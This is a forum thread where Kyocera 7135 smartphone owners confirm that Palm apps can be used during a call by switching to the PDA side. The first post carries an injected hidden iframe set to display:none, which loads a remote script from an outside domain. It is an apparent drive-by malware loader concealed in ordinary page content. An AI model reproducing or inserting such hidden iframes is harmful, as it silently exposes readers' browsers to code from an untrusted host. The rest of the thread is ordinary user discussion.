+ Reply to Thread
    jeh

Palm apps while on the phone??

Some comments I saw somewhere (maybe the review thread at cnet.com) indicated that unlike the 6035, you can't do anything with any non-phone Palm apps while you're on the phone. Say, to look up a reservation confirmation code that you put in your Calendar. Is that true?

(yes, I tried the search)<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You can do anything that does not require an internet connection while using the phone.

So you can check appointments, contacts, documents (Quickoffice, Docs to Go..) add on games.

What you are unable to do is check email or surf the web when you are in a phone call.

The phone is the best!
    Mark
    ==========================
    Palm Personal > Palm V > Palm Vx > Clie 760 > Kyocera 7135 > Treo 600 >Treo 650 > (Maybe i730??)

jeh
    Ah, just like the 6035 then. *whew*

Thanks for the very fast answer.

Edit: but they said

"In phone mode, the touch screen is deactivated, and you can navigate only via the rockerlike OK buttons."

Is that true?

CNET did nothing but hose up thier reveiw on the 7135 and show just how uneducated they are.

They got more wrong then right on the reveiw.

Originally posted by jeh
    Ah, just like the 6035 then. *whew*

Thanks for the very fast answer.

Edit: but they said

"In phone mode, the touch screen is deactivated, and you can navigate only via the rockerlike OK buttons."

Is that true?
    THe touch screen is inactive in phone mode because you use the keypad. A quick tap of the phone icon switches you to the PDA for full touch screen action.

Originally posted by HoTSynC
    THe touch screen is inactive in phone mode because you use the keypad. A quick tap of the phone icon switches you to the PDA for full touch screen action.
    This is a relief. I saw that review and just about wrote off the 7135 on the spot. It'd be insane to not be able to use the PDA functionality while talking on the phone:

"Hang on a sec, I gotta find a sticky note to write that down."

"But I thought your cellphone was a PDA too."

"It is, but I can't use the touchscreen while talking on the phone."

"I don't know which of you is the bigger bozo, the guy who designed it that way, or you for buying one."

D.

I've seen lots of conflicting info on this topic. Can somebody confirm that I can be talking on the phone and use the touchscreen at the same time for Palm apps, just like on my 6035?

Thanks

Originally posted by DougF
    I've seen lots of conflicting info on this topic. Can somebody confirm that I can be talking on the phone and use the touchscreen at the same time for Palm apps, just like on my 6035?

Thanks
    Of course you can. You can do anything you want on the Palm side while talking on the phone (that doesn't use data or play MP3's).
    Please visit my picture site: Robert-O-Rama :)

I have had my 7135 for a week. You can't use the touch screen while on the phone BUT, you can flip over to the palm side while on the phone and do what you would like.

Just hit the house/home key to get to the Palm side and away you go. Once you are on the palm side the screen becomes a touch screen.

So while on the phone you can take notes, look up numbers, play a game or two.

Hope that answers your question.

js

Originally posted by DougF

Thanks
    I can confirm it. I do it all the time. I can do it while using the speaker phone or while using it through the ear piece by taking it away from my ear to check a phone number, date, etc. I have even played games while talking to someone on the speaker phone. There is no doubt. You can use apps while on the phone.